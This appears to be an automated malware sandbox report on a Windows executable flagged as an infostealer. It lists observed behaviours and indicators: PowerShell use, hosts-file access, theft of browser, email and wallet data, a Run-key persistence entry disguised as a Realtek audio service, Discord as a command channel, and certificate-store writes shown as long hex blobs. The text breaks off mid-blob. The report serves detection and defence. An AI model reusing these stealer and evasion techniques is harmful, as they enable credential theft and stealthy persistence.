758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5

Analysis

max time kernel
150s
max time network
96s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
08/06/2024, 13:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Size

11.8MB
MD5

44d806942d0bbc5f4302867243b66a18
SHA1

4405cd3f84680d4888ef7f9fb0a651c82b3573b9
SHA256

758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5
SHA512

661aeb2b1037c1ef446056f8f71a0d4f2eba8702072b931c87604ac58f408d93c1fcb2cc04b1fceb312318361b3c88e3e94c8ab0e318e4e8a669f81950a5c6f9
SSDEEP

98304:5pmhaWByjQAidj9ZMDvcpOnUxBEtg71fnhfagct8zaqz/8:5d+yjQLKvcpPxCa1VT8

Score

8^/10

execution persistence spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2364	powershell.exe
2892	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
5	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	api.ipify.org
1	ip-api.com
2	api.ipify.org

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1504	wmic.exe
576	wmic.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	3	Go-http-client/1.1

Modifies system certificate store 2 TTPs 11 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f53000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c7f000000010000000c000000300a06082b060105050703097e000000010000000800000000c001b39667d601030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae4747e000000010000000800000000c001b39667d6017f000000010000000c000000300a06082b060105050703091d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb0b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f53000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c7f000000010000000c000000300a06082b060105050703097e000000010000000800000000c001b39667d601030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	758bb37f86eb52387320b71e3e3de6a0fecd283eaf6c28225d892b57b978f4e5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 5c000000010000000400000000080000040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae4747e000000010000000800000000c001b39667d6017f000000010000000c000000300a06082b060105050703091d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb0b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f19000000010000001000000068cb42b035ea773e52ef50ecf50ec5292000